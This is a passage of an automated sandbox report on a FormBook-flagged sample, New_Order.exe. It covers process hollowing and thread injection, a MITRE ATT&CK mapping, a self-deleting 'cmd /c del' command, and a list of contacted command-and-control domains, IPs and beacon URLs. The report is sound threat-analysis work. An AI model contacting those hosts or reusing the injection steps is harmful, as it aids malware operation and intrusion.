          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395BC2C mov eax, dword ptr fs:[00000030h]1_2_0395BC2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]1_2_039BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]1_2_039BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A44B mov eax, dword ptr fs:[00000030h]1_2_0395A44B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394746D mov eax, dword ptr fs:[00000030h]1_2_0394746D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869080 mov eax, dword ptr fs:[00000030h]7_2_04869080
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]7_2_048E3884
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]7_2_048E3884
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487849B mov eax, dword ptr fs:[00000030h]7_2_0487849B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A90AF mov eax, dword ptr fs:[00000030h]7_2_048A90AF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov ecx, dword ptr fs:[00000030h]7_2_0489F0BF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]7_2_0489F0BF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]7_2_0489F0BF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938CD6 mov eax, dword ptr fs:[00000030h]7_2_04938CD6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049214FB mov eax, dword ptr fs:[00000030h]7_2_049214FB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048658EC mov eax, dword ptr fs:[00000030h]7_2_048658EC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]7_2_048E6CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]7_2_048E6CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]7_2_048E6CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]7_2_048E6C0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]7_2_048E6C0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]7_2_048E6C0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]7_2_048E6C0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]7_2_04934015
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]7_2_04934015
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]7_2_048E7016
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]7_2_048E7016
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]7_2_048E7016
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]7_2_0493740D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]7_2_0493740D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]7_2_0493740D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489BC2C mov eax, dword ptr fs:[00000030h]7_2_0489BC2C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]7_2_0487B02A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]7_2_0487B02A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]7_2_0487B02A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]7_2_0487B02A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A44B mov eax, dword ptr fs:[00000030h]7_2_0489A44B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]7_2_04880050
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]7_2_04880050
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]7_2_048FC450
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]7_2_048FC450
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04922073 mov eax, dword ptr fs:[00000030h]7_2_04922073
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488746D mov eax, dword ptr fs:[00000030h]7_2_0488746D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04931074 mov eax, dword ptr fs:[00000030h]7_2_04931074
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488C182 mov eax, dword ptr fs:[00000030h]7_2_0488C182
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A185 mov eax, dword ptr fs:[00000030h]7_2_0489A185
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]7_2_0489FD9B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]7_2_0489FD9B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892990 mov eax, dword ptr fs:[00000030h]7_2_04892990
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048935A1 mov eax, dword ptr fs:[00000030h]7_2_048935A1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E69A6 mov eax, dword ptr fs:[00000030h]7_2_048E69A6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]7_2_048961A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]7_2_048961A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]7_2_048E51BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]7_2_048E51BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]7_2_048E51BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]7_2_048E51BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]7_2_04891DB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]7_2_04891DB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]7_2_04891DB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]7_2_049305AC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]7_2_049305AC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov ecx, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04918DF1 mov eax, dword ptr fs:[00000030h]7_2_04918DF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]7_2_0486B1E1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]7_2_0486B1E1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]7_2_0486B1E1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048F41E8 mov eax, dword ptr fs:[00000030h]7_2_048F41E8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]7_2_0487D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]7_2_0487D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]7_2_04869100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]7_2_04869100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]7_2_04869100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938D34 mov eax, dword ptr fs:[00000030h]7_2_04938D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov ecx, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]7_2_04894D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]7_2_04894D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]7_2_04894D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]7_2_0489513A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]7_2_0489513A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
Source: C:\Windows\SysWOW64\svchost.exe  Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe  Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\New_Order.exe  Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\svchost.exe  Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\wscript.exe  Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\svchost.exe  Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\svchost.exe  Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1260000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\New_Order.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EEB008
Source: C:\Users\user\Desktop\New_Order.exe  Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
Source: explorer.exe, 00000002.00000000.253797902.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp  Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp  Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000002.495816911.0000000001128000.00000004.00000020.sdmp  Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\New_Order.exe  Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information:

Yara detected FormBook

          Remote Access Functionality:

Yara detected FormBook

Mitre Att&ck Matrix

The matrix is listed by tactic; a number in parentheses is the count attached to that technique in the matrix.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Shared Modules (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Access Token Manipulation (1); Process Injection (612); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Virtualization/Sandbox Evasion (3); Access Token Manipulation (1); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (231); Virtualization/Sandbox Evasion (3); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data

Behavior Graph

Behavior Graph ID: 411746  Sample: New_Order.exe  Start date: 12/05/2021  Architecture: WINDOWS  Score: 100

[Graph image not included; the process chain and node annotations recovered from the graph text follow.]

Start node: DNS/IP info www.thelordnelsonwinthorpe.com, www.algaeflipflops.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
-> New_Order.exe (18) started; dropped file: C:\Users\user\AppData\...\a9g5j8lkcs3.dll, PE32; signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
  -> svchost.exe started; signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
    -> explorer.exe (6), injected process; DNS/IP info: voiceclubdubai.com 91.148.168.141, ports 49717 and 80, TELEPOINTBG Bulgaria; fwd3.hosts.co.uk 85.233.160.22, ports 49720 and 80, ISIONUKNamescoLimitedGB United Kingdom; 15 other IPs or domains; signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
      -> wscript.exe started; signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        -> cmd.exe (1) started
          -> conhost.exe started


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
New_Order.exe | 39% | Virustotal |
New_Order.exe | 18% | Metadefender |
New_Order.exe | 60% | ReversingLabs | Win32.Trojan.SpyNoon
New_Order.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll | 45% | ReversingLabs | Win32.Trojan.Pwsx

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.New_Order.exe.24e0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.svchost.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.New_Order.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
0.0.New_Order.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.roastedorganic.com | 75.2.115.196 | true | true | | unknown
www.year-action.xyz | 150.95.255.38 | true | true | | unknown
www.geacasolaro.com | 62.149.189.71 | true | true | | unknown
voiceclubdubai.com | 91.148.168.141 | true | true | | unknown
www.hdjakdhf.com | 8.210.40.49 | true | true | | unknown
susanestuart.com | 34.102.136.180 | true | false | | unknown
fwd3.hosts.co.uk | 85.233.160.22 | true | true | | unknown
www.thelordnelsonwinthorpe.com | 94.136.40.51 | true | false | | unknown
shops.myshopify.com | 23.227.38.74 | true | true | | unknown
www.algaeflipflops.com | 64.190.62.111 | true | false | | unknown
www.charmboutiques.com | unknown | unknown | true | | unknown
www.shanghainternational.com | unknown | unknown | true | | unknown
www.voiceclubdubai.com | unknown | unknown | true | | unknown
www.websitemax.co.uk | unknown | unknown | true | | unknown
www.susanestuart.com | unknown | unknown | true | | unknown
www.w-c727or.net | unknown | unknown | true | | unknown
www.kantan-sedori.com | unknown | unknown | true | | unknown

                                            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh | true | Avira URL Cloud: safe | unknown
http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp | true | Avira URL Cloud: safe | unknown
